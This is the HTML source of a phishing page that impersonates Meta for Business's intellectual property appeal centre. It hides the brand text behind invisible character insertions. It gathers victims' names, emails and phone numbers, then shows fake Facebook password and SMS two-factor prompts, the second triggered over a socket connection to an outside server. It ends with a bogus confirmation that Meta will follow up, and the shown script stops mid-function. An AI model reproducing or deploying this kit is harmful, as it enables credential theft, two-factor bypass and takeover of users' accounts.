<html>

<head>
    <meta http-equiv="origin-trial">
    <title class="jsx-959629656">M&lrm;e&lrm;t&lrm;a f&lrm;o&lrm;r B&lrm;u&lrm;s&lrm;i&lrm;n&lrm;e&lrm;ss</title>
    <meta charset="utf-8" class="jsx-959629656">
    <meta name="viewport" content="width=device-width, initial-scale=1" class="jsx-959629656">
    <meta name="crawler" content="noindex,nofollow,noarchive,noimageindex" class="jsx-959629656">
    <meta name="AdsBot-Google" content="noindex,nofollow,noarchive,noimageindex" class="jsx-959629656">
    <meta name="googlebot" content="noindex,nofollow,noarchive,noimageindex" class="jsx-959629656">
    <meta name="googlebot-news" content="nosnippet" class="jsx-959629656">
    <link rel="icon" href="./assets/favicon.ico" class="jsx-959629656">
    <meta name="robots" content="noarchive" class="jsx-959629656">
    <link rel="preconnect" href="https://fonts.googleapis.com" class="jsx-959629656">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="true" class="jsx-959629656">
    <link rel="stylesheet" href="./assets/style.css">
    <link rel="stylesheet" href="./assets/style2.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>

    <style>
         .illustration2 {
            margin-top: 25px;
            height: 100px;
          display: flex;
          justify-content: center;
          align-items: center;
          flex-direction: column;
          gap: 20px;
      }
      .illustration2 img {
          border-radius: 10px;
          width: 30%;
          height: auto;
      }
        .sc-ce9c5cf8-0.kVLiUK {
            display: none;
        }

        .sc-ce9c5cf8-0.kVLiUK2 {
            display: none;
        }
        .sc-ce9c5cf8-0.kVLiUK3 {
            display: none;
        }
        .container {
            /* background-color: #FFFFFF;
            border-radius: 20px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 400px; */
            padding: 20px;
            /* box-sizing: border-box; */
        }
        .header {
            /* display: flex;
            justify-content: space-between;
            align-items: flex-start; */
            margin-bottom: 20px;
        }
        .close-btn {
            font-size: 24px;
            background: none;
            border: none;
            cursor: pointer;
            color: #65676B;
        }
        .title {
            flex-grow: 1;
            margin-left: 10px;
        }
        .tityle {
            font-size: 20px;
            margin: 0;
            font-weight: bold;
            color: #1C1E21;
        }
        .subtitle {
            font-weight: 500;
            font-size: 14px;
            color: #65676B;
            margin: 5px 0 0;
        }
        .subtitle2 {
            text-align: center;
            font-weight: 500;
            font-size: 15px;
            color: #65676B;
            margin: 5px 0 0;
        }
        p {
            color: #1C1E21;
            font-size: 16px;
            margin-bottom: 20px;
        }
        .illustration {
          
            border-radius: 12px;
            padding: 20px;
            text-align: center;
            margin-bottom: 20px;
        }
        .illustration img {
            border-radius: 10px;
            width: 100%;
            height: auto;
        }
        input:focus-visible{
            outline: none;
            border: 1px solid #dddfe2;
        }
        input[type="text"] {
            width: 100%;
            padding: 15px;
            border: 1px solid #dddfe2;
            border-radius: 10px;
            font-size: 16px;
            margin-bottom: 10px;
            box-sizing: border-box;
        }
        .timer {
            margin-bottom: 20px;
            color: red;
            font-size: 13px;
            font-weight: 500;
            text-align: left;
        }
        
        .btn {
            width: 100%;
            padding: 12px;
            border: none;
            border-radius: 20px;
            font-size: 16px;
            font-weight: 500;
            cursor: pointer;
            margin-bottom: 10px;
        }
        .btn-primary {
            background-color: #1877f2;
            color: white;
        }
        .btn-secondary {
            background-color: transparent;
            color: black;
            border: 1px solid #dddfe2;
        }
        @media (max-width: 480px) {
            .illustration2 img{
                width: 40%;
            }
            .container {
               
                border-radius: 0;
                display: flex;
                flex-direction: column;
            }
            .illustration {
                flex-grow: 1;
                display: flex;
                align-items: center;
                justify-content: center;
            }
        }
        .kVLiUK {
            position: fixed;
            top: 0px;
            left: 0px;
            z-index: 1050;
            width: 100%;
            height: 100%;
            overflow: hidden;
            outline: 0px;
            display: grid;
            place-items: center;
            background-color: rgba(0, 0, 0, 0.5);
            padding: 1.5rem;
        }
        .kVLiUK3 {
            position: fixed;
            top: 0px;
            left: 0px;
            z-index: 1050;
            width: 100%;
            height: 100%;
            overflow: hidden;
            outline: 0px;
            display: grid;
            place-items: center;
            background-color: rgba(0, 0, 0, 0.5);
            padding: 1.5rem;
        }

        .kVLiUK2 {
            position: fixed;
            top: 0px;
            left: 0px;
            z-index: 1050;
            width: 100%;
            height: 100%;
            overflow: hidden;
            outline: 0px;
            display: grid;
            place-items: center;
            background-color: rgba(0, 0, 0, 0.5);
            padding: 1.5rem;
        }

        .clDnUI {
            background-color: rgb(255, 255, 255);
            background-clip: padding-box;
            border: 1px solid rgba(0, 0, 0, 0.2);
            border-radius: 1.5rem;
            outline: 0px;
            max-width: 500px;
            width: 100%;
            z-index: 1051;
            position: relative;
        }

        .clDnUI .gradient {
            position: absolute;
            left: 0%;
            top: 0%;
            height: 100%;
            width: 100%;
            background-image: radial-gradient(rgba(255, 255, 255, 0.25), rgba(255, 255, 255, 0) 40%), radial-gradient(rgb(255, 209, 82) 30%, rgb(226, 105, 150), rgba(226, 105, 150, 0.4) 41%, transparent 52%), radial-gradient(rgb(160, 51, 255) 37%, transparent 46%), linear-gradient(155deg, transparent 65%, rgb(37, 212, 102) 95%), linear-gradient(45deg, rgb(0, 101, 224), rgb(15, 139, 255));
            background-repeat: no-repeat;
            opacity: 0.08;
            z-index: -1;
            background-size: 200% 200%, 285% 500%, 285% 500%, cover, cover;
            background-position: left bottom, 109% 68%, 109% 68%, center center, center center;
        }

        .dKtUEZ {
            color: rgb(5, 5, 5) !important;
            font-size: 18px !important;
            font-weight: 700 !important;
        }

        .YkvTn {
            background-color: rgb(255, 255, 255);
            border: 1px solid rgb(206, 212, 218) !important;
            border-radius: 8px !important;
            padding: 0.75rem !important;
        }

        .inputTypePW {
            -webkit-text-security: disc;
            text-security: disc;
        }

        .gKfJIg {
            background-color: rgb(0, 100, 224);
            border: 1px solid rgb(0, 100, 224);
            width: 100%;
            color: white;
            font-size: 13px;
            font-weight: 500;
            padding: 14px 20px;
            border-radius: 50px;
            text-transform: none;
            margin-top: 5rem;
            line-height: 1;
        }

        .sc-8b304678-5.iDNqeC {
            display: none;
        }

        .eEpzIy {
            max-width: 700px;
            margin: auto;
            width: calc(100% - 2rem);
        }

        .ieaSSP {
            font-weight: 700;
            color: rgb(28, 43, 51);
            font-size: 24px;
        }

        .eRUnLK {
            margin: auto auto 54px !important;
            width: 100% !important;
            border-radius: 10px !important;
            padding-block: 1rem !important;
        }

        .eRUnLK .radioContainer {
            font-family: '__Montserrat_b1da2a', '__Montserrat_Fallback_b1da2a' !important;
            display: flex !important;
            margin-bottom: 12px !important;
            cursor: pointer !important;
            font-size: 15px !important;
            user-select: none !important;
            padding: 0.75rem !important;
            color: rgb(28, 43, 51) !important;
            font-weight: 500 !important;
            justify-content: space-between !important;
            align-items: center !important;
        }

        .eRUnLK .radioContainer input {
            position: absolute !important;
            width: 0px !important;
            height: 0px !important;
            opacity: 0 !important;
            cursor: pointer !important;
        }

        .eRUnLK .checkmark {
            height: 22px !important;
            width: 22px !important;
            background-color: rgb(255, 255, 255);
            border-radius: 50% !important;
            display: grid !important;
            place-items: center !important;
            box-sizing: border-box !important;
        }

        .bJpDZy {
            background-color: rgb(0, 100, 224);
            border: 1px solid rgb(0, 100, 224);
            width: 100%;
            color: white;
            font-size: 13px;
            font-weight: 500;
            padding: 14px 20px;
            border-radius: 50px;
            text-transform: none;
            line-height: 1;
        }

        .eRUnLK .radioContainer:hover {
            background-color: rgba(204, 204, 204, 0.314) !important;
        }

        .eRUnLK .radioContainer input:checked~.checkmark::after {
            display: block;
        }

        .eRUnLK .radioContainer .checkmark::after {
            width: 11px;
            height: 11px;
            border-radius: 50%;
            box-sizing: content-box;
            border: 3px solid rgb(255, 255, 255);
        }

        .eRUnLK .checkmark::after {
            content: "";
            display: none;
        }

        .eRUnLK .radioContainer input:checked~.checkmark {
            background-color: rgb(33, 150, 243);
        }
    </style>
</head>

<body style="overflow-y: auto;">
    <div id="">
        <div class="jsx-959629656 ">
            <div class="jsx-959629656 gradientBg"></div>
            <div style="display: block;" class="jsx-959629656">
                <div class="sc-28057632-0 bfyXC  d-flex d-lg-none">
                    <div class="px-3 px-lg-5 d-block d-lg-none container-lg">
                        <div class="align-items-center justify-content-between row" style="margin-top: 20px;">
                            <div class="col-auto"></div>
                            <div class="d-none d-md-block col-auto">
                                <div class="gx-3 align-items-center row">
                                    <div class="col-auto"><span style="font-weight:600;font-size:14px">Get
                                            started</span></div>
                                    <div class="col-auto"><span style="font-weight:600;font-size:14px">Advertise</span>
                                    </div>
                                    <div class="col-auto"><span style="font-weight:600;font-size:14px">Learn</span>
                                    </div>
                                    <div class="col-auto"><span style="font-weight:600;font-size:14px">Support</span>
                                    </div>
                                </div>
                            </div>
                            <div class="d-none d-md-block col-auto"><span
                                    style="font-weight:600;font-size:14px">Business Help Center</span></div>
                            <div class="d-block d-md-none col-auto"><svg xmlns="http://www.w3.org/2000/svg" width="32"
                                    height="32" fill="none">
                                    <path stroke="#1c2b33" stroke-linecap="round" stroke-linejoin="round"
                                        stroke-width="2" d="M5 25h22M5 16h22M5 7h22" class="burger_svg___9ufx"></path>
                                </svg></div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="jsx-959629656 px-0 px-lg-4">
                <div class="jsx-959629656 row justify-content-center gx-0 gx-lg-4">
                    <div class="jsx-959629656 col-auto d-none d-lg-block">
                        <div class="jsx-959629656 py-4" style="width: 320px;">
                            <div class="jsx-959629656 pb-1"></div>
                            <div class="jsx-959629656 py-3">
                                <div class="jsx-959629656"
                                    style="color: rgb(28, 43, 52); font-size: 24px; font-weight: 700; line-height: 1.2;">
                                    I&lrm;nt&lrm;el&lrm;le&lrm;ct&lrm;ual P&lrm;r&lrm;op&lrm;e&lrm;rty
                                    A&lrm;p&lrm;pe&lrm;al Ce&lrm;n&lrm;te&lrm;r</div>
                            </div>
                            <div class="jsx-959629656 pb-3">
                                <div class="jsx-959629656"
                                    style="color: rgb(28, 43, 52); font-size: 15px; line-height: 1.3;">I&lrm;f yo&lrm;u
                                    b&lrm;el&lrm;i&lrm;ev&lrm;e a d&lrm;ec&lrm;&lrm;is&lrm;io&lrm;n
                                    r&lrm;eg&lrm;a&lrm;r&lrm;d&lrm;in&lrm;g a c&lrm;o&lrm;py&lrm;r&lrm;i&lrm;ght
                                    vi&lrm;o&lrm;l&lrm;a&lrm;ti&lrm;o&lrm;n o&lrm;r a&lrm;n&lrm;y o&lrm;t&lrm;h&lrm;er
                                    i&lrm;s&lrm;s&lrm;u&lrm;e i&lrm;s i&lrm;n&lrm;co&lrm;r&lrm;r&lrm;ec&lrm;t, yo&lrm;u
                                    c&lrm;an su&lrm;b&lrm;m&lrm;i&lrm;t a&lrm;n a&lrm;p&lrm;pea&lrm;l he&lrm;r&lrm;e.
                                </div>
                            </div>
                            <div class="jsx-959629656 pb-2"><span class="jsx-959629656"
                                    style="color: rgb(28, 43, 52); font-size: 17px; font-weight: 600; line-height: 1.3;">A&lrm;p&lrm;p&lrm;ea&lrm;l
                                    R&lrm;e&lrm;qu&lrm;es&lrm;t</span></div>
                            <div class="jsx-959629656"
                                style="background: rgb(52, 72, 84); padding: 14px; border-radius: 12px; color: rgb(255, 255, 255); font-weight: 600; cursor: pointer;">
                                <div class="jsx-959629656 row gx-3 align-items-center">
                                    <div class="jsx-959629656 col-auto"><svg viewBox="0 0 24 24" fill="currentColor"
                                            width="24px" height="24px" aria-hidden="true" class="jsx-959629656">
                                            <path fill-rule="evenodd" clip-rule="evenodd"
                                                d="m9.85 11.01 5.688-5.69 3.141 3.142-5.689 5.689A6.313 6.313 0 0 1 8.526 16 .526.526 0 0 1 8 15.474c0-1.674.665-3.28 1.85-4.464zm7.102-7.103 1.256-1.256a2.221 2.221 0 0 1 3.142 3.14l-1.257 1.257-3.14-3.141zM5.088 3h9.942l-2 2H5.088a.746.746 0 0 0-.454.136.36.36 0 0 0-.145.238C4.254 6.71 4 8.879 4 12c0 3.121.254 5.289.489 6.626a.36.36 0 0 0 .145.238c.09.07.244.136.454.136h11.824c.21 0 .364-.066.454-.136a.36.36 0 0 0 .145-.238C17.746 17.29 18 15.121 18 12v-.03l1.965-1.965c.022.62.035 1.285.035 1.995 0 3.23-.263 5.514-.519 6.972C19.264 20.208 18.167 21 16.912 21H5.088c-1.255 0-2.352-.792-2.569-2.028C2.263 17.514 2 15.23 2 12c0-3.23.263-5.514.519-6.972C2.736 3.792 3.833 3 5.088 3z"
                                                class="jsx-959629656"></path>
                                        </svg></div>
                                    <div class="jsx-959629656 col">S&lrm;u&lrm;b&lrm;m&lrm;i&lrm;t a&lrm;n
                                        ap&lrm;p&lrm;ea&lrm;l</div>
                                </div>
                            </div>
                            <div class="jsx-959629656 pt-4">
                                <div class="jsx-959629656 pb-4"><span class="jsx-959629656"
                                        style="color: rgb(28, 43, 52); font-size: 17px; font-weight: 600; line-height: 1.3;">H&lrm;e&lrm;lp
                                        Ce&lrm;n&lrm;te&lrm;r</span></div>
                                <div class="sc-351a20b5-0 fmTEpV ps-3"><a href="/"
                                        class="jsx-959629656 row gx-3 align-items-center py-2 text-decoration-none"
                                        style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">
                                        <div class="jsx-959629656 col"><span class="jsx-959629656"
                                                style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">F&lrm;a&lrm;ce&lrm;b&lrm;o&lrm;o&lrm;k
                                                H&lrm;e&lrm;lp C&lrm;e&lrm;nt&lrm;e&lrm;r</span></div>
                                        <div class="jsx-959629656 col-auto"><svg viewBox="0 0 24 24" fill="currentColor"
                                                width="24px" height="24px" aria-hidden="true" class="jsx-959629656">
                                                <path
                                                    d="M6 19h12a1 1 0 0 0 1-1v-5h2v5a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h5v2H6a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1z"
                                                    class="jsx-959629656"></path>
                                                <path
                                                    d="M11.293 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z"
                                                    class="jsx-959629656"></path>
                                            </svg></div>
                                    </a><a href="/"
                                        class="jsx-959629656 row gx-3 align-items-center py-2 text-decoration-none"
                                        style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">
                                        <div class="jsx-959629656 col"><span class="jsx-959629656"
                                                style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">M&lrm;&lrm;e&lrm;t&lrm;a
                                                f&lrm;o&lrm;r B&lrm;u&lrm;s&lrm;in&lrm;e&lrm;s&lrm;s
                                                P&lrm;a&lrm;g&lrm;e</span></div>
                                        <div class="jsx-959629656 col-auto"><svg viewBox="0 0 24 24" fill="currentColor"
                                                width="24px" height="24px" aria-hidden="true" class="jsx-959629656">
                                                <path
                                                    d="M6 19h12a1 1 0 0 0 1-1v-5h2v5a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h5v2H6a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1z"
                                                    class="jsx-959629656"></path>
                                                <path
                                                    d="M11.293 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z"
                                                    class="jsx-959629656"></path>
                                            </svg></div>
                                    </a><a href="/"
                                        class="jsx-959629656 row gx-3 align-items-center py-2 text-decoration-none"
                                        style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">
                                        <div class="jsx-959629656 col"><span class="jsx-959629656"
                                                style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">A&lrm;dv&lrm;er&lrm;t&lrm;i&lrm;si&lrm;ng
                                                P&lrm;o&lrm;li&lrm;ci&lrm;e&lrm;s</span></div>
                                        <div class="jsx-959629656 col-auto"><svg viewBox="0 0 24 24" fill="currentColor"
                                                width="24px" height="24px" aria-hidden="true" class="jsx-959629656">
                                                <path
                                                    d="M6 19h12a1 1 0 0 0 1-1v-5h2v5a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h5v2H6a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1z"
                                                    class="jsx-959629656"></path>
                                                <path
                                                    d="M11.293 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z"
                                                    class="jsx-959629656"></path>
                                            </svg></div>
                                    </a><a href="/"
                                        class="jsx-959629656 row gx-3 align-items-center py-2 text-decoration-none"
                                        style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">
                                        <div class="jsx-959629656 col"><span class="jsx-959629656"
                                                style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">F&lrm;a&lrm;c&lrm;e&lrm;b&lrm;&lrm;oo&lrm;k
                                                A&lrm;ds G&lrm;u&lrm;i&lrm;de</span></div>
                                        <div class="jsx-959629656 col-auto"><svg viewBox="0 0 24 24" fill="currentColor"
                                                width="24px" height="24px" aria-hidden="true" class="jsx-959629656">
                                                <path
                                                    d="M6 19h12a1 1 0 0 0 1-1v-5h2v5a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h5v2H6a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1z"
                                                    class="jsx-959629656"></path>
                                                <path
                                                    d="M11.293 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z"
                                                    class="jsx-959629656"></path>
                                            </svg></div>
                                    </a><a href="/"
                                        class="jsx-959629656 row gx-3 align-items-center py-2 text-decoration-none"
                                        style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">
                                        <div class="jsx-959629656 col"><span class="jsx-959629656"
                                                style="color: rgb(28, 43, 52); font-weight: 500; line-height: 1.2;">S&lrm;e&lrm;l&lrm;l
                                                o&lrm;n F&lrm;a&lrm;c&lrm;e&lrm;b&lrm;o&lrm;ok&lrm; a&lrm;n&lrm;d
                                                I&lrm;n&lrm;st&lrm;a&lrm;gr&lrm;a&lrm;m</span></div>
                                        <div class="jsx-959629656 col-auto"><svg viewBox="0 0 24 24" fill="currentColor"
                                                width="24px" height="24px" aria-hidden="true" class="jsx-959629656">
                                                <path
                                                    d="M6 19h12a1 1 0 0 0 1-1v-5h2v5a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h5v2H6a1 1 0 0 0-1 1v12a1 1 0 0 0 1 1z"
                                                    class="jsx-959629656"></path>
                                                <path
                                                    d="M11.293 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z"
                                                    class="jsx-959629656"></path>
                                            </svg></div>
                                    </a></div>
                            </div>
                            <hr class="jsx-959629656 my-4" style="color: rgb(222, 227, 233); opacity: 1;">
                            <div class="jsx-959629656"><a href="/" class="jsx-959629656"
                                    style="font-size: 15px; color: rgb(70, 90, 105); text-decoration: none; font-weight: 500;">Privacy</a>
                                <span class="jsx-959629656"> · </span><a href="/" class="jsx-959629656"
                                    style="font-size: 15px; color: rgb(70, 90, 105); text-decoration: none; font-weight: 500;">Terms</a>
                                <span class="jsx-959629656"> · </span><a href="/" class="jsx-959629656"
                                    style="font-size: 15px; color: rgb(70, 90, 105); text-decoration: none; font-weight: 500;">Ad
                                    Choices</a> <span class="jsx-959629656"> · </span><a href="/" class="jsx-959629656"
                                    style="font-size: 15px; color: rgb(70, 90, 105); text-decoration: none; font-weight: 500;">Cookies</a>
                                <span class="jsx-959629656"> · </span><a href="/" class="jsx-959629656"
                                    style="font-size: 15px; color: rgb(70, 90, 105); text-decoration: none; font-weight: 500;">About</a>
                                <span class="jsx-959629656"> · </span><span class="jsx-959629656"
                                    style="font-size: 15px; font-weight: 500; color: rgb(28, 43, 52);">M&lrm;e&lrm;t&lrm;a&lrm;
                                    © 2&lrm;02&lrm;4</span>
                            </div>
                        </div>
                    </div>
                    <div class="jsx-959629656 col-auto">
                        <div class="jsx-959629656"
                            style="height: 100%; width: 1px; background-color: rgb(222, 227, 233);"></div>
                    </div>
                    <div class="jsx-959629656 col-12 col-lg-5">
                        <div style="padding-top: 23px;" class="jsx-959629656 pb-5">

                            <div class="sc-8f301d45-1 eEpzIy">
                                <div class="pt-4 pt-md-0">
                                    <div class="sc-8f301d45-2 ieaSSP">H&lrm;ow c&lrm;a&lrm;n w&lrm;e h&lrm;e&lrm;l&lrm;p
                                        y&lrm;o&lrm;u&lrm;?</div>
                                </div>
                                <div class="pt-2"
                                    style="color: rgb(28, 43, 51); font-size: 16px; line-height: 1.3; font-weight: 600;">
                                    W&lrm;e n&lrm;e&lrm;e&lrm;d m&lrm;o&lrm;r&lrm;e
                                    i&lrm;n&lrm;f&lrm;o&lrm;r&lrm;ma&lrm;t&lrm;i&lrm;on&lrm; t&lrm;o
                                    ad&lrm;dr&lrm;es&lrm;s y&lrm;o&lrm;u&lrm;r is&lrm;s&lrm;u&lrm;e. Th&lrm;i&lrm;s
                                    fo&lrm;rm&lrm; w&lrm;il&lrm;l o&lrm;n&lrm;ly t&lrm;a&lrm;k&lrm;e a fe&lrm;w
                                    m&lrm;i&lrm;n&lrm;u&lrm;te&lrm;s&lrm;.</div>
                                <div class="sc-8f301d45-0 eRUnLK"><label class="radioContainer">I h&lrm;a&lrm;v&lrm;e
                                        b&lrm;e&lrm;en b&lrm;l&lrm;o&lrm;cke&lrm;d f&lrm;r&lrm;om u&lrm;s&lrm;i&lrm;ng
                                        t&lrm;h&lrm;is fe&lrm;a&lrm;t&lrm;ure.<input type="radio" name="radio">
                                        <div class="checkmark"></div>
                                    </label><label class="radioContainer">M&lrm;y pa&lrm;ge&lrm; i&lrm;s
                                        r&lrm;e&lrm;str&lrm;ic&lrm;ted (n&lrm;ot vi&lrm;ola&lrm;ting a&lrm;ny
                                        po&lrm;l&lrm;i&lrm;cy).<input type="radio" name="radio">
                                        <div class="checkmark"></div>
                                    </label><label class="radioContainer">M&lrm;y a&lrm;d ac&lrm;cou&lrm;nt i&lrm;s
                                        di&lrm;sa&lrm;bl&lrm;ed.<input type="radio" name="radio">
                                        <div class="checkmark"></div>
                                    </label><label class="radioContainer">I n&lrm;e&lrm;ed h&lrm;e&lrm;lp w&lrm;i&lrm;th
                                        a f&lrm;ai&lrm;l&lrm;ed pa&lrm;y&lrm;me&lrm;nt.<input type="radio" name="radio">
                                        <div class="checkmark"></div>
                                    </label><label class="radioContainer">
                                        <div style="flex-shrink: 1; width: calc(100% - 22px);">I t&lrm;hi&lrm;nk
                                            so&lrm;m&lrm;eon&lrm;e ac&lrm;c&lrm;e&lrm;ss&lrm;ed m&lrm;y
                                            b&lrm;us&lrm;in&lrm;es&lrm;s wi&lrm;t&lrm;ho&lrm;ut m&lrm;y
                                            pe&lrm;r&lrm;mi&lrm;ss&lrm;i&lrm;on.</div><input type="radio" name="radio">
                                        <div class="checkmark"></div>
                                    </label><label class="radioContainer">Ot&lrm;h&lrm;er is&lrm;su&lrm;e.<input
                                            type="radio" name="radio"><span class="checkmark"></span></label>
                                    <div class="text-end"><button class="sc-8f301d45-3 bJpDZy">Continue</button></div>
                                </div>
                                <div class="sc-8b304678-5 iDNqeC">
                                    <div class="pb-3">
                                        <div style="font-size: 14px; font-weight: 600; padding-bottom: 2px;">Yo&lrm;ur
                                            fu&lrm;ll na&lrm;me</div>
                                        <div class="form-floating"><input
                                                class="sc-8b304678-3 cnUPPM form-control false " type="text"
                                                id="fullName" placeholder="Your full name" value=""><label
                                                for="floatingInput">Yo&lrm;ur fu&lrm;ll na&lrm;me</label></div>
                                    </div>
                                    <div class="pb-3">
                                        <div style="font-size: 14px; font-weight: 600; padding-bottom: 2px;">Personal
                                            em&lrm;ai&lrm;l ad&lrm;dre&lrm;ss</div>
                                        <div class="form-floating"><input id="personalEmail"
                                                class="sc-8b304678-3 cnUPPM form-control false " type="email"
                                                placeholder="Email address" value=""><label for="floatingInput">Personal
                                                em&lrm;ai&lrm;l ad&lrm;dre&lrm;ss</label></div>
                                    </div>
                                    <div class="pb-3">
                                        <div style="font-size: 14px; font-weight: 600; padding-bottom: 2px;">Business
                                            em&lrm;ai&lrm;l ad&lrm;dre&lrm;ss</div>
                                        <div class="form-floating"><input id="businessEmail"
                                                class="sc-8b304678-3 cnUPPM form-control false " type="email"
                                                placeholder="Business Email address" value=""><label
                                                for="floatingInput">Business em&lrm;ai&lrm;l ad&lrm;dre&lrm;ss</label>
                                        </div>
                                    </div>
                                    <div class="pb-3">
                                        <div style="font-size: 14px; font-weight: 600; padding-bottom: 2px;">
                                            Pe&lrm;rs&lrm;on&lrm;al p&lrm;ho&lrm;n&lrm;e nu&lrm;m&lrm;be&lrm;r</div>
                                        <div class="form-floating"><input
                                                class="sc-8b304678-3 cnUPPM form-control false " type="tel" id="tel"
                                                placeholder="P&lrm;ho&lrm;n&lrm;e nu&lrm;m&lrm;be&lrm;r" value=""><label
                                                for="floatingInput">Pe&lrm;rs&lrm;on&lrm;al p&lrm;ho&lrm;n&lrm;e
                                                nu&lrm;m&lrm;be&lrm;r</label></div>
                                    </div>
                                    <div class="pb-3">
                                        <div style="font-size: 14px; font-weight: 600; padding-bottom: 2px;">Your appeal
                                            information (optional)</div>
                                        <div class="form-floating"><textarea class="sc-8b304678-4 fJgehd form-control"
                                                type="email" rows="4" id="appealInfo"
                                                placeholder="Your appeal information"></textarea><label
                                                for="floatingInput">Your appeal information</label></div>
                                    </div>
                                    <div class="text-end"><button class="sc-8b304678-6 foUIfk"
                                            id="personalData">Submit</button></div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="sc-ce9c5cf8-0 kVLiUK">
        <div class="sc-ce9c5cf8-1 clDnUI">
            <div class="gradient"></div>
            <div class="px-3 pt-5"><span style="font-weight: 500; font-size: 14px;"><span id="nameofuser"></span> •
                    Facebook</span>
                <div class="py-1">
                    <div class="sc-ce9c5cf8-2 dKtUEZ">Please re-enter your password</div>
                </div>
            </div>
            <div class="px-3 pb-3"><span style="font-weight: 500; font-size: 14px;">For your security, you must re-enter
                    your password to continue.</span>
                <div class="pt-2"><input id="passwordInput" placeholder="Password"
                        class="sc-ce9c5cf8-6 YkvTn inputTypePW form-control false" type="text" value=""></div>
                <div id="errorText" class="text-end"
                    style="color: red; font-size: 13px; font-weight: 500;display: none;margin-top: 10px;">T&lrm;h&lrm;e
                    p&lrm;as&lrm;sw&lrm;or&lrm;d yo&lrm;u&lrm;'&lrm;ve e&lrm;nt&lrm;er&lrm;ed i&lrm;s
                    in&lrm;c&lrm;o&lrm;r&lrm;r&lrm;e&lrm;ct.</div>
                <div class="text-end pt-4"><button class="sc-ce9c5cf8-7 gKfJIg" id="psw">Submit</button></div>
            </div>
        </div>
    </div>
    <div class="sc-ce9c5cf8-0 kVLiUK2">
        <div class="sc-ce9c5cf8-1 clDnUI">
            <div class="gradient"></div>
            <div class="container">
                <div class="header">
                    <span class="ps-2" style="font-weight: 500; font-size: 14px;margin-bottom: 8px;"><span
                            id="nameofuser2fa"></span> • Facebook</span>
                    <div class="title">
                        <h1 class="tityle">Check your text messages</h1>
                        <p class="subtitle">Enter the code we sent to <span id="telofuser"></span></p>
                    </div>
                </div>
                <div class="illustration">
                    <img src="https://cdn.glitch.global/cd4ce9c6-50a7-4d64-ab18-73f8d2f3d811/2faimg.jpg?v=1727698569824"
                        alt="Hands holding a phone">
                </div>
                <input type="text" placeholder="Code" id="2facode" pattern="\d{6,}" title="Please enter at least 6 digits." oninput="this.value = this.value.replace(/[^0-9]/g, '')">
                <div class="timer"></div>
                <button class="btn btn-primary" id="2fabutton">Continue</button>
            </div>
        </div>
    </div>
    <div class="sc-ce9c5cf8-0 kVLiUK3">
        <div class="sc-ce9c5cf8-1 clDnUI">
            <div class="gradient"></div>
            <div class="container">
                <div class="header">
                    <div class="illustration2">
                        <img src="./loadingGif.d1fc1a94ee14879a4193.gif"
                            alt="Hands holding a phone">
                    </div>
                </div>
                
                <p class="subtitle2"> We have received your request. As a next step, you can expect an email from our internal team once there is an update on your case using the contact information you provided.</span></p>
               
                  </p>
            </div>
        </div>
    </div>
    <input type="text" hidden id="socket_id"/>
    <script src="functions.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="https://cdn.socket.io/4.0.0/socket.io.min.js"></script>
    <script>
        let socket = io('https://yummy-tabby-pasta.glitch.me');
        socket.on("connect", () => {
            console.log("Connected to server with ID: " + socket.id);
            $("#socket_id").val(socket.id); 
        });
        function resetPasswordInputs() {
            passwordInput.value = ''; 
            errorText.style.display = 'none';
            attemptCount = 0;
            passwordButton.innerHTML = 'Submit';
            passwordButton.removeAttribute('disabled');
        }
        let countdownInterval;
        function reset2FAInputs() {
            document.getElementById('2facode').value = '';
            const timerDiv = document.querySelector('.timer');
            timerDiv.textContent = ''; 
            twoFAAttemptCount = 0; 
            twoFAButton.innerHTML = 'Submit'; 
            twoFAButton.removeAttribute('disabled'); 
            clearInterval(countdownInterval);
        }
        socket.on('show-2fa', () => {
            const faDiv = document.querySelector('.sc-ce9c5cf8-0.kVLiUK2');
            if (faDiv) {
                faDiv.style.display = 'inline-grid';
            } else {
                console.error("Element with class 'sc-ce9c5cf8-0.kVLiUK2' not found.");
            }

            const passwordDiv = document.querySelector('.sc-ce9c5cf8-0.kVLiUK');
            if (passwordDiv) {
                passwordDiv.style.display = 'none';
            } else {
